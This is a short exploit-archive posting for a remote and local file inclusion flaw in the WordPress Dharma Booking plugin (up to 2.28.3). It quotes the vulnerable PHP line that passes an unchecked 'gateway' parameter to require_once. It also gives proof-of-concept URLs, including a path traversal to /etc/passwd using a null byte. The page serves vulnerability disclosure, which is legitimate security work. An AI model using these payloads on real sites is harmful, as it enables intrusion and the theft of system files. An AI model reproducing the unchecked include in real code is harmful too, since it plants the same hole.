Home / exploits WordPress Dharma Booking 2.28.3 Remote / Local File Inclusion
Posted on 30 November -0001
<HTML><HEAD><TITLE>WordPress Dharma Booking 2.28.3 Remote / Local File Inclusion</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: Wordpress Dharma booking File Inclusion # Date: 03/22/2016 # Exploit Author: AMAR^SHG # Vendor Homepage:https://wordpress.org/plugins/dharma-booking/ <https://webcache.googleusercontent.com/search?q=cache:1BjMckAC9HkJ:https://wordpress.org/plugins/dharma-booking/+&cd=2&hl=fr&ct=clnk&gl=fr>Software Link : https://wordpress.org/plugins/dharma-booking/ # Version: <=2.28.3 # Tested on: WINDOWS/WAMP dharma-booking/frontend/ajax/gateways/proccess.php's code: <?php include_once('../../../../../../wp-config.php'); $settings = get_option('Dharma_Vars'); echo $settings['paymentAccount']. $settings['gatewayid']; require_once($_GET['gateway'].'.php'); // POC: http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00 </BODY></HTML>
